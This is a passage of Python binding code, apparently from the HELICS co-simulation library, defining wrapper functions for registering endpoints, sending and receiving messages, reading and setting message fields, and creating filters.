return HelicsEndpoint(result, cleanup=False)
def helicsFederateRegisterGlobalEndpoint(fed: HelicsFederate, name: str, type: str = "") -> HelicsEndpoint:
"""
Create an endpoint.
The endpoint becomes part of the federate and is destroyed when the federate is freed so there are no separate free functions for endpoints.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` in which to create an endpoint must have been created with helicsCreateMessageFederate or helicsCreateCombinationFederate.
- **`name`** - The identifier for the endpoint.handle, the given name is the global identifier.
- **`type`** - A string describing the expected type of the publication (optional).
**Returns**: `helics.HelicsEndpoint`.
"""
f = loadSym("helicsFederateRegisterGlobalEndpoint")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), cstring(type), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsEndpoint(result, cleanup=False)
def helicsFederateGetEndpoint(fed: HelicsFederate, name: str) -> HelicsEndpoint:
"""
Get an endpoint object from a name.
**Parameters**
- **`fed`** - The message `helics.HelicsFederate` to use to get the endpoint.
- **`name`** - The name of the endpoint.
**Returns**: `helics.HelicsEndpoint`.
"""
f = loadSym("helicsFederateGetEndpoint")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsEndpoint(result, cleanup=False)
def helicsFederateGetEndpointByIndex(fed: HelicsFederate, index: int) -> HelicsEndpoint:
"""
Get an endpoint by its index, typically already created via registerInterfaces file or something of that nature.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` in which to create a publication.
- **`index`** - The index of the publication to get.
**Returns**: `helics.HelicsEndpoint`.
"""
f = loadSym("helicsFederateGetEndpointByIndex")
err = helicsErrorInitialize()
result = f(fed.handle, index, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsEndpoint(result, cleanup=False)
def helicsEndpointIsValid(endpoint: HelicsEndpoint) -> bool:
"""
Check if an endpoint is valid.
**Parameters**
- **`endpoint`** - The endpoint object to check.
**Returns**: `True` if the Endpoint object represents a valid endpoint.
"""
f = loadSym("helicsEndpointIsValid")
result = f(endpoint.handle)
return result == 1
def helicsEndpointSetDefaultDestination(endpoint: HelicsEndpoint, destination: str):
"""
Set the default destination for an endpoint if no other endpoint is given.
**Parameters**
- **`endpoint`** - The endpoint to set the destination for.
- **`destination`** - A string naming the desired default endpoint.
"""
f = loadSym("helicsEndpointSetDefaultDestination")
err = helicsErrorInitialize()
f(endpoint.handle, cstring(destination), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsEndpointGetDefaultDestination(endpoint: HelicsEndpoint) -> str:
"""
Get the default destination for an endpoint.
**Parameters**
- **`endpoint`** - The endpoint to set the destination for.
**Returns**: A string with the default destination.
"""
f = loadSym("helicsEndpointGetDefaultDestination")
result = f(endpoint.handle)
return ffi.string(result).decode()
def helicsEndpointSendBytes(endpoint: HelicsEndpoint, data: bytes):
"""
Send a message from a specific endpoint.
**Parameters**
- **`endpoint`** - The endpoint to send the data from.
- **`data`** - The data to send
"""
err = helicsErrorInitialize()
if isinstance(data, str):
data = data.encode()
if not isinstance(data, bytes):
raise HelicsException(
"""Raw data must be of type `bytes`. Got {t} instead. Try converting it to bytes (e.g. `"hello world".encode()`""".format(t=type(data))
)
inputDataLength = len(data)
f = loadSym("helicsEndpointSendBytes")
f(endpoint.handle, data, inputDataLength, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsEndpointSendBytesTo(endpoint: HelicsEndpoint, data: bytes, destination: str):
"""
Send a message to the specified destination.
**Parameters**
- **`endpoint`** - The endpoint to send the data from.
- **`data`** - The data to send.
- **`destination`** - The target destination.
"""
err = helicsErrorInitialize()
if isinstance(data, str):
data = data.encode()
if not isinstance(data, bytes):
raise HelicsException(
"""Raw data must be of type `bytes`. Got {t} instead. Try converting it to bytes (e.g. `"hello world".encode()`""".format(t=type(data))
)
inputDataLength = len(data)
if HELICS_VERSION == 2:
f = loadSym("helicsEndpointSendMessageRaw")
f(endpoint.handle, cstring(destination), data, inputDataLength, err)
else:
f = loadSym("helicsEndpointSendBytesTo")
f(endpoint.handle, data, inputDataLength, cstring(destination), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsEndpointSendMessageRaw(endpoint: HelicsEndpoint, destination: str, data: bytes):
"""
Send a message to the specified destination.
**Parameters**
- **`endpoint`** - The endpoint to send the data from.
- **`destination`** - The target destination.
- **`data`** - The data to send.
**DEPRECATED**
Use `helicsEndpointSendBytesTo` instead
"""
warnings.warn("This function is deprecated. Use `helicsEndpointSendBytesTo` instead.")
helicsEndpointSendBytesTo(endpoint, data, destination)
def helicsEndpointSendBytesToAt(endpoint: HelicsEndpoint, data: bytes, destination: str, time: HelicsTime):
"""
Send a message at a specific time to the specified destination.
**Parameters**
- **`endpoint`** - The endpoint to send the data from.
- **`data`** - The data to send.
- **`destination`** - The target destination.
- **`time`** - The time the message should be sent.
"""
err = helicsErrorInitialize()
if isinstance(data, str):
data = data.encode()
if not isinstance(data, bytes):
raise HelicsException(
"""Raw data must be of type `bytes`. Got {t} instead. Try converting it to bytes (e.g. `"hello world".encode()`""".format(t=type(data))
)
inputDataLength = len(data)
if HELICS_VERSION == 2:
f = loadSym("helicsEndpointSendEventRaw")
f(endpoint.handle, cstring(destination), data, inputDataLength, time, err)
else:
f = loadSym("helicsEndpointSendBytesToAt")
f(endpoint.handle, data, inputDataLength, cstring(destination), time, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsEndpointSendEventRaw(
endpoint: HelicsEndpoint,
destination: str,
data: bytes,
time: HelicsTime,
):
"""
Send a message at a specific time to the specified destination.
**Parameters**
- **`endpoint`** - The endpoint to send the data from.
- **`destination`** - The target destination.
- **`data`** - The data to send.
- **`time`** - The time the message should be sent.
**DEPRECATED**
Use `helicsEndpointSendBytesToAt` instead.
"""
warnings.warn("This function is deprecated. Use `helicsEndpointSendBytesToAt` instead.")
helicsEndpointSendBytesToAt(endpoint, data, destination, time)
def helicsEndpointSendMessageObject(endpoint: HelicsEndpoint, message: HelicsMessage):
"""
Send a message object from a specific endpoint.
**Parameters**
- **`endpoint`** - The endpoint to send the data from.
- **`message`** - The actual message to send which will be copied.
**DEPRECATED**
"""
warnings.warn("This function has been deprecated. Use `helicsEndpointSendMessage` instead.")
return helicsEndpointSendMessage(endpoint, message)
def helicsEndpointSendMessageObjectZeroCopy(endpoint: HelicsEndpoint, message: HelicsMessage):
"""
Send a message object from a specific endpoint.
**Parameters**
- **`endpoint`** - The endpoint to send the data from.
- **`message`** - The actual message to send which will be copied.
**DEPRECATED**
"""
warnings.warn("This function has been deprecated. Use `helicsEndpointSendMessage` instead.")
return helicsEndpointSendMessage(endpoint, message)
def helicsEndpointSendMessage(endpoint: HelicsEndpoint, message: HelicsMessage):
"""
Send a message object from a specific endpoint.
**Parameters**
- **`endpoint`** - The endpoint to send the data from.
- **`message`** - The actual message to send which will be copied.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsEndpointSendMessageObject")
else:
f = loadSym("helicsEndpointSendMessage")
err = helicsErrorInitialize()
f(endpoint.handle, message.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsEndpointSubscribe(endpoint: HelicsEndpoint, name: str):
"""
Subscribe an endpoint to a publication.
**Parameters**
- **`endpoint`** - The endpoint to use.
- **`name`** - The name of the publication.
"""
f = loadSym("helicsEndpointSubscribe")
err = helicsErrorInitialize()
f(endpoint.handle, cstring(name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateHasMessage(fed: HelicsFederate) -> bool:
"""
Check if the federate has any outstanding messages.
**Parameters**
- **`fed`** - The federate to check.
**Returns**: `True` if the federate has a message waiting, `False` otherwise.
"""
f = loadSym("helicsFederateHasMessage")
result = f(fed.handle)
return result == 1
def helicsEndpointHasMessage(endpoint: HelicsEndpoint) -> bool:
"""
Check if a given endpoint has any unread messages.
**Parameters**
- **`endpoint`** - The endpoint to check.
**Returns**: `True` if the endpoint has a message, `False` otherwise.
"""
f = loadSym("helicsEndpointHasMessage")
result = f(endpoint.handle)
return result == 1
def helicsFederatePendingMessageCount(fed: HelicsFederate) -> int:
"""
Returns the number of pending receives for the specified destination endpoint.
**Parameters**
- **`fed`** - The federate to get the number of waiting messages from.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsFederatePendingMessages")
else:
f = loadSym("helicsFederatePendingMessageCount")
return f(fed.handle)
def helicsFederatePendingMessages(fed: HelicsFederate) -> int:
"""
Returns the number of pending receives for the specified destination endpoint.
**Parameters**
- **`fed`** - The federate to get the number of waiting messages from.
**DEPRECATED**
"""
warnings.warn("This function has been deprecated. Use `helicsFederatePendingMessageCount` instead.")
return helicsFederatePendingMessageCount(fed)
def helicsEndpointPendingMessages(endpoint: HelicsEndpoint) -> int:
"""
Returns the number of pending receives for all endpoints of a particular federate.
**Parameters**
- **`endpoint`** - The endpoint to query.
**DEPRECATED**
"""
warnings.warn("This function has been deprecated. Use `helicsEndpointPendingMessageCount` instead.")
return helicsEndpointPendingMessageCount(endpoint)
def helicsEndpointPendingMessageCount(endpoint: HelicsEndpoint) -> int:
"""
Returns the number of pending receives for all endpoints of a particular federate.
**Parameters**
- **`endpoint`** - The endpoint to query.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsEndpointPendingMessages")
else:
f = loadSym("helicsEndpointPendingMessageCount")
return f(endpoint.handle)
def helicsEndpointGetMessageObject(endpoint: HelicsEndpoint) -> HelicsMessage:
"""
Receive a packet from a particular endpoint.
**Parameters**
- **`endpoint`** - The identifier for the endpoint.
**Returns**: A message.
**DEPRECATED**
"""
warnings.warn("This function has been deprecated. Use `helicsEndpointGetMessage` instead.")
return helicsEndpointGetMessage(endpoint)
def helicsEndpointGetMessage(endpoint: HelicsEndpoint) -> HelicsMessage:
"""
Receive a packet from a particular endpoint.
**Parameters**
- **`endpoint`** - The identifier for the endpoint.
**Returns**: A message object.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsEndpointGetMessageObject")
else:
f = loadSym("helicsEndpointGetMessage")
return HelicsMessage(f(endpoint.handle))
def helicsEndpointCreateMessageObject(endpoint: HelicsEndpoint) -> HelicsMessage:
"""
Create a new empty message.
The message is empty and isValid will return false since there is no data associated with the message yet.
**Parameters**
- **`endpoint`** - The endpoint object to associate the message with.
**DEPRECATED**
"""
warnings.warn("This function has been deprecated. Use `helicsEndpointCreateMessage` instead")
return helicsEndpointCreateMessage(endpoint)
def helicsEndpointCreateMessage(endpoint: HelicsEndpoint) -> HelicsMessage:
"""
Create a new empty message object.
The message is empty and isValid will return false since there is no data associated with the message yet.
**Parameters**
- **`endpoint`** - The endpoint object to associate the message with.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsEndpointCreateMessageObject")
else:
f = loadSym("helicsEndpointCreateMessage")
err = helicsErrorInitialize()
result = f(endpoint.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsMessage(result)
def helicsFederateGetMessageObject(fed: HelicsFederate) -> HelicsMessage:
"""
Receive a communication message for any endpoint in the federate.
The return order will be in order of endpoint creation.
So all messages that are available for the first endpoint.handle, then all for the second, and so on.
Within a single endpoint.handle, the messages are ordered by time, then source_id, then order of arrival.
**Returns**: A `helics.HelicsMessage` which references the data in the message.
**DEPRECATED**
"""
warnings.warn("This function has been deprecated. Use helicsFederateGetMessage instead")
return helicsFederateGetMessage(fed)
def helicsFederateGetMessage(fed: HelicsFederate) -> HelicsMessage:
"""
Receive a communication message for any endpoint in the federate.
The return order will be in order of endpoint creation.
So all messages that are available for the first endpoint.handle, then all for the second, and so on.
Within a single endpoint.handle, the messages are ordered by time, then source_id, then order of arrival.
**Returns**: A `helics.HelicsMessage` which references the data in the message.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsFederateGetMessageObject")
else:
f = loadSym("helicsFederateGetMessage")
result = f(fed.handle)
return HelicsMessage(result)
def helicsFederateCreateMessageObject(fed: HelicsFederate) -> HelicsMessage:
"""
Create a new empty message object.
The message is empty and isValid will return false since there is no data associated with the message yet.
**Parameters**
- **`fed`** - the `helics.HelicsFederate` to associate the message with.
**DEPRECATED**
"""
warnings.warn("This function has been deprecated. Use helicsFederateCreateMessage instead")
return helicsFederateCreateMessage(fed)
def helicsFederateCreateMessage(fed: HelicsFederate) -> HelicsMessage:
"""
Create a new empty message object.
The message is empty and isValid will return false since there is no data associated with the message yet.
**Parameters**
- **`fed`** - the `helics.HelicsFederate` to associate the message with.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsFederateCreateMessageObject")
else:
f = loadSym("helicsFederateCreateMessage")
err = helicsErrorInitialize()
result = f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsMessage(result)
def helicsFederateClearMessages(fed: HelicsFederate):
"""
Clear all stored messages from a federate.
This clears messages retrieved through `helics.helicsFederateGetMessage` or `helics.helicsFederateGetMessageObject`.
**Parameters**
- **`fed`** - The federate to clear the message for.
"""
f = loadSym("helicsFederateClearMessages")
f(fed.handle)
def helicsEndpointClearMessages(endpoint: HelicsEndpoint):
"""
Clear all message from an endpoint.
_**Deprecated: Use `helics.helicsFederateClearMessages` to free all messages, or `helics.helicsMessageFree` to clear an individual message.
**Parameters**
- **`endpoint`** - The endpoint object to operate on.
**DEPRECATED**
"""
if HELICS_VERSION == 2:
warnings.warn("This function is deprecated. Clearing is handled at the federate level.")
f = loadSym("helicsEndpointClearMessages")
f(endpoint.handle)
else:
warnings.warn("This function is deprecated. Clearing is handled at the federate level.")
def helicsEndpointGetType(endpoint: HelicsEndpoint) -> str:
"""
Get the type specified for an endpoint.
**Parameters**
- **`endpoint`** - The endpoint object in question.
**Returns**: The defined type of the endpoint.
"""
f = loadSym("helicsEndpointGetType")
result = f(endpoint.handle)
return ffi.string(result).decode()
def helicsEndpointGetName(endpoint: HelicsEndpoint) -> str:
"""
Get the name of an endpoint.
**Parameters**
- **`endpoint`** - The endpoint object in question.
**Returns**: The name of the endpoint.
"""
f = loadSym("helicsEndpointGetName")
result = f(endpoint.handle)
return ffi.string(result).decode()
def helicsFederateGetEndpointCount(fed: HelicsFederate) -> int:
"""
Get the number of endpoints in a federate.
**Parameters**
- **`fed`** - The message federate to query.
**Returns**: (-1) if fed was not a valid federate, otherwise returns the number of endpoints.
"""
f = loadSym("helicsFederateGetEndpointCount")
result = f(fed.handle)
return result
def helicsEndpointGetInfo(endpoint: HelicsEndpoint) -> str:
"""
Get the data in the info field of a filter.
**Parameters**
- **`end`** - The filter to query.
**Returns**: A string with the info field string.
"""
f = loadSym("helicsEndpointGetInfo")
result = f(endpoint.handle)
return ffi.string(result).decode()
def helicsEndpointSetInfo(endpoint: HelicsEndpoint, info: str):
"""
Set the data in the info field for a filter.
**Parameters**
- **`endpoint`** - The endpoint to query.
- **`info`** - The string to set.
"""
f = loadSym("helicsEndpointSetInfo")
err = helicsErrorInitialize()
f(endpoint.handle, cstring(info), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsEndpointSetOption(endpoint: HelicsEndpoint, option: HelicsHandleOption, value: int):
"""
Set a handle option on an endpoint.
**Parameters**
- **`endpoint`** - The endpoint to modify.
- **`option`** - Integer code for the option to set `helics.HelicsHandleOption`.
- **`value`** - The value to set the option to.
"""
f = loadSym("helicsEndpointSetOption")
err = helicsErrorInitialize()
f(endpoint.handle, HelicsHandleOption(option), value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsEndpointGetOption(endpoint: HelicsEndpoint, option: HelicsHandleOption) -> int:
"""
Get the value of handle option on an endpoint.
**Parameters**
- **`endpoint`** - The endpoint to modify.
- **`option`** - Integer code for the option to set `helics.HelicsHandleOption`.
**Returns**: the value of the option, for boolean options will be 0 or 1.
"""
f = loadSym("helicsEndpointGetOption")
result = f(endpoint.handle, HelicsHandleOption(option))
return result
def helicsMessageGetSource(message: HelicsMessage) -> str:
"""
Message operation functions.
Functions for working with helics message envelopes.
Get the source endpoint of a message.
**Parameters**
- **`message`** - The message object in question.
**Returns**: A string with the source endpoint.
"""
f = loadSym("helicsMessageGetSource")
result = f(message.handle)
return ffi.string(result).decode()
def helicsMessageGetDestination(message: HelicsMessage) -> str:
"""
Get the destination endpoint of a message.
**Parameters**
- **`message`** - The message object in question.
**Returns**: A string with the destination endpoint.
"""
f = loadSym("helicsMessageGetDestination")
result = f(message.handle)
return ffi.string(result).decode()
def helicsMessageGetOriginalSource(message: HelicsMessage) -> str:
"""
Get the original source endpoint of a message, the source may have been modified by filters or other actions.
**Parameters**
- **`message`** - The message object in question.
**Returns**: A string with the source of a message.
"""
f = loadSym("helicsMessageGetOriginalSource")
result = f(message.handle)
return ffi.string(result).decode()
def helicsMessageGetOriginalDestination(message: HelicsMessage) -> str:
"""
Get the original destination endpoint of a message, the destination may have been modified by filters or other actions.
**Parameters**
- **`message`** - The message object in question.
**Returns**: A string with the original destination of a message.
"""
f = loadSym("helicsMessageGetOriginalDestination")
result = f(message.handle)
return ffi.string(result).decode()
def helicsMessageGetTime(message: HelicsMessage) -> HelicsTime:
"""
Get the helics time associated with a message.
**Parameters**
- **`message`** - The message object in question.
**Returns**: The time associated with a message.
"""
f = loadSym("helicsMessageGetTime")
result = f(message.handle)
return result
def helicsMessageGetString(message: HelicsMessage) -> str:
"""
Get the payload of a message as a string.
**Parameters**
- **`message`** - The message object in question.
**Returns**: A string representing the payload of a message.
"""
f = loadSym("helicsMessageGetString")
result = f(message.handle)
return ffi.string(result, helicsMessageGetByteCount(message)).decode()
def helicsMessageGetMessageID(message: HelicsMessage) -> int:
"""
Get the messageID of a message.
**Parameters**
- **`message`** - The message object in question.
**Returns**: The messageID.
"""
f = loadSym("helicsMessageGetMessageID")
result = f(message.handle)
return result
def helicsMessageGetFlagOption(message: HelicsMessage, flag: int) -> bool:
"""
Get flag on a message.
**Parameters**
- **`message`** - The message object in question.
- **`flag`** - The flag to check should be between [0,15].
**Returns**: The flags associated with a message.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsMessageCheckFlag")
else:
f = loadSym("helicsMessageGetFlagOption")
result = f(message.handle, flag)
return result == 1
def helicsMessageCheckFlag(message: HelicsMessage, flag: int) -> bool:
"""
Check if a flag is set on a message.
**Parameters**
- **`message`** - The message object in question.
- **`flag`** - The flag to check should be between [0,15].
**Returns**: The flags associated with a message.
**DEPRECATED**
"""
warnings.warn("This function is deprecated. Use `helicsMessageGetFlagOption` instead.")
return helicsMessageGetFlagOption(message, flag)
def helicsMessageGetByteCount(message: HelicsMessage) -> int:
"""
Get the size of the data payload in bytes.
**Parameters**
- **`message`** - The message object in question.
**Returns**: The size of the data payload.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsMessageGetRawDataSize")
else:
f = loadSym("helicsMessageGetByteCount")
result = f(message.handle)
return result
def helicsMessageGetRawDataSize(message: HelicsMessage) -> int:
"""
Get the size of the data payload in bytes.
**Parameters**
- **`message`** - The message object in question.
**Returns**: The size of the data payload.
**DEPRECATED**
"""
warnings.warn("This function is deprecated. Use `helicsMessageGetByteCount` instead.")
return helicsMessageGetByteCount(message)
def helicsMessageGetRawData(message: HelicsMessage) -> bytes:
"""
Get the raw data for a message object.
**Parameters**
- **`message`** - A message object to get the data for.
**Returns**: Raw string data.
**DEPRECATED**
"""
warnings.warn("This function is deprecated. Use `helicsMessageGetBytes` instead.")
return helicsMessageGetBytes(message)
def helicsMessageGetBytes(message: HelicsMessage) -> bytes:
"""
Get the raw data for a message object.
**Parameters**
- **`message`** - A message object to get the data for.
**Returns**: Raw string data.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsMessageGetRawData")
else:
f = loadSym("helicsMessageGetBytes")
err = helicsErrorInitialize()
maxMessageLen = helicsMessageGetByteCount(message) + 1024
data = ffi.new("char[{maxMessageLen}]".format(maxMessageLen=maxMessageLen))
actualSize = ffi.new("int[1]")
f(message.handle, data, maxMessageLen, actualSize, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
return ffi.unpack(data, length=actualSize[0])
def helicsMessageGetRawDataPointer(message: HelicsMessage) -> pointer:
"""
Get a pointer to the raw data of a message.
**Parameters**
- **`message`** - A message object to get the data for.
**Returns**: A pointer to the raw data in memory, the pointer may be NULL if the message is not a valid message.
**DEPRECATED**
"""
warnings.warn("This function has been deprecated. Use `helicsMessageGetBytesPointer` instead.")
return helicsMessageGetBytesPointer(message)
def helicsMessageGetBytesPointer(message: HelicsMessage) -> pointer:
"""
Get a pointer to the raw data of a message.
**Parameters**
- **`message`** - A message object to get the data for.
**Returns**: A pointer to the raw data in memory, the pointer may be NULL if the message is not a valid message.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsMessageGetRawDataPointer")
else:
f = loadSym("helicsMessageGetBytesPointer")
result = f(message.handle)
return result
def helicsMessageIsValid(message: HelicsMessage) -> bool:
"""
A check if the message contains a valid payload.
**Parameters**
- **`message`** - The message object in question.
**Returns**: `True` if the message contains a payload.
"""
f = loadSym("helicsMessageIsValid")
result = f(message.handle)
return result == 1
def helicsMessageSetSource(message: HelicsMessage, source: str):
"""
Set the source of a message.
**Parameters**
- **`message`** - The message object in question.
- **`source`** - A string containing the source.
"""
f = loadSym("helicsMessageSetSource")
err = helicsErrorInitialize()
f(message.handle, cstring(source), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsMessageSetDestination(message: HelicsMessage, destination: str):
"""
Set the destination of a message.
**Parameters**
- **`message`** - The message object in question.
- **`destination`** - A string containing the new destination.
"""
f = loadSym("helicsMessageSetDestination")
err = helicsErrorInitialize()
f(message.handle, cstring(destination), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsMessageSetOriginalSource(message: HelicsMessage, source: str):
"""
Set the original source of a message.
**Parameters**
- **`message`** - The message object in question.
- **`source`** - A string containing the new original source.
"""
f = loadSym("helicsMessageSetOriginalSource")
err = helicsErrorInitialize()
f(message.handle, cstring(source), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsMessageSetOriginalDestination(message: HelicsMessage, destination: str):
"""
Set the original destination of a message.
**Parameters**
- **`message`** - The message object in question.
- **`destination`** - A string containing the new original source.
"""
f = loadSym("helicsMessageSetOriginalDestination")
err = helicsErrorInitialize()
f(message.handle, cstring(destination), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsMessageSetTime(message: HelicsMessage, time: HelicsTime):
"""
Set the delivery time for a message.
**Parameters**
- **`message`** - The message object in question.
- **`time`** - The time the message should be delivered.
"""
f = loadSym("helicsMessageSetTime")
err = helicsErrorInitialize()
f(message.handle, time, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsMessageResize(message: HelicsMessage, new_size: int):
"""
Resize the data buffer for a message.
The message data buffer will be resized. There are no guarantees on what is in the buffer in newly allocated space.
If the allocated space is not sufficient new allocations will occur
**Parameters**
- **`message`** - The message object in question.
- **`new_size`** - The new size in bytes of the buffer.
"""
f = loadSym("helicsMessageResize")
err = helicsErrorInitialize()
f(message.handle, new_size, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsMessageReserve(message: HelicsMessage, reserve_size: int):
"""
Reserve space in a buffer but don't actually resize.
The message data buffer will be reserved but not resized.
**Parameters**
- **`message`** - The message object in question.
- **`reserve_size`** - The number of bytes to reserve in the message object.
"""
f = loadSym("helicsMessageReserve")
err = helicsErrorInitialize()
f(message.handle, reserve_size, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsMessageSetMessageID(message: HelicsMessage, message_id: int):
"""
Set the message ID for the message.
Normally this is not needed and the core of HELICS will adjust as needed.
**Parameters**
- **`message`** - The message object in question.
- **`message_id`** - A new message ID.
"""
f = loadSym("helicsMessageSetMessageID")
err = helicsErrorInitialize()
f(message.handle, message_id, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsMessageClearFlags(message: HelicsMessage):
"""
Clear the flags of a message.
**Parameters**
- **`message`** - The message object in question.
"""
f = loadSym("helicsMessageClearFlags")
f(message.handle)
def helicsMessageSetFlagOption(message: HelicsMessage, flag: int, value: bool):
"""
Set a flag on a message.
**Parameters**
- **`message`** - The message object in question.
- **`flag`** - An index of a flag to set on the message.
- **`value`** - The desired value of the flag.
"""
f = loadSym("helicsMessageSetFlagOption")
err = helicsErrorInitialize()
f(message.handle, flag, value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsMessageSetString(message: HelicsMessage, string: str):
"""
Set the data payload of a message as a string.
**Parameters**
- **`message`** - The message object in question.
- **`string`** - A string containing the message data.
"""
f = loadSym("helicsMessageSetString")
err = helicsErrorInitialize()
f(message.handle, cstring(string), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsMessageSetData(message: HelicsMessage, data: bytes):
"""
Set the data payload of a message as raw data.
**Parameters**
- **`message`** - The message object in question.
- **`data`** - A string containing the message data.
"""
f = loadSym("helicsMessageSetData")
err = helicsErrorInitialize()
if isinstance(data, str):
data = data.encode()
if not isinstance(data, bytes):
raise HelicsException(
"""Raw data must be of type `bytes`. Got {t} instead. Try converting it to bytes (e.g. `"hello world".encode()`""".format(t=type(data))
)
inputDataLength = len(data)
f(message.handle, data, inputDataLength, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsMessageAppendData(message: HelicsMessage, data: bytes):
"""
Append data to the payload.
**Parameters**
- **`message`** - The message object in question.
- **`data`** - A string containing the message data to append.
"""
f = loadSym("helicsMessageAppendData")
err = helicsErrorInitialize()
if isinstance(data, str):
data = data.encode()
if not isinstance(data, bytes):
raise HelicsException(
"""Raw data must be of type `bytes`. Got {t} instead. Try converting it to bytes (e.g. `"hello world".encode()`""".format(t=type(data))
)
inputDataLength = len(data)
f(message.handle, data, inputDataLength, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsMessageCopy(source_message: HelicsMessage, destination_message: HelicsMessage):
"""
Copy a message object.
**Parameters**
- **`source_message`** - The message object to copy from.
- **`destination_message`** - The message object to copy to.
"""
f = loadSym("helicsMessageCopy")
err = helicsErrorInitialize()
f(source_message, destination_message, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsMessageClone(message: HelicsMessage) -> HelicsMessage:
"""
Clone a message object.
**Parameters**
- **`message`** - The message object to copy from.
**Returns**: `helics.HelicsMessage`.
"""
f = loadSym("helicsMessageClone")
err = helicsErrorInitialize()
result = f(message.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsMessage(result)
def helicsMessageFree(message: HelicsMessage):
"""
Free a message object from memory. Memory for message is managed so not using this function does not create memory leaks, this is an indication to the system that the memory for this message is done being used and can be reused for a new message.
`helics.helicsFederateClearMessages` can also be used to clear up all stored messages at once.
"""
f = loadSym("helicsMessageFree")
f(message.handle)
def helicsFederateRegisterFilter(fed: HelicsFederate, type: HelicsFilterType, name: str) -> HelicsFilter:
"""
Create a source Filter on the specified federate.
Filters can be created through a federate or a core.handle, linking through a federate allows a few extra features of name matching to function on the federate interface but otherwise equivalent behavior.
**Parameters**
- **`fed`** - The federate to register through.
- **`type`** - The type of filter to create `helics.HelicsFilterType`.
- **`name`** - The name of the filter (can be NULL).
**Returns**: `helics.HelicsFilter`.
"""
f = loadSym("helicsFederateRegisterFilter")
err = helicsErrorInitialize()
result = f(fed.handle, HelicsFilterType(type), cstring(name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsFilter(result)
def helicsFederateRegisterGlobalFilter(fed: HelicsFederate, type: HelicsFilterType, name: str) -> HelicsFilter:
"""
Create a global source filter through a federate.
Filters can be created through a federate or a core.handle, linking through a federate allows a few extra features of name matching to function on the federate interface but otherwise equivalent behavior.
**Parameters**
- **`fed`** - The federate to register through.
- **`type`** - The type of filter to create `helics.HelicsFilterType`.
- **`name`** - The name of the filter (can be NULL).
**Returns**: `helics.HelicsFilter`.
"""
f = loadSym("helicsFederateRegisterGlobalFilter")
err = helicsErrorInitialize()
result = f(fed.handle, HelicsFilterType(type), cstring(name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsFilter(result)
def helicsFederateRegisterCloningFilter(fed: HelicsFederate, name: str) -> HelicsCloningFilter:
"""
Create a cloning Filter on the specified federate.
Cloning filters copy a message and send it to multiple locations, source and destination can be added through other functions.
**Parameters**
- **`fed`** - The federate to register through.
- **`name`** - The name of the filter (can be NULL).
**Returns**: `helics.HelicsCloningFilter`.
"""
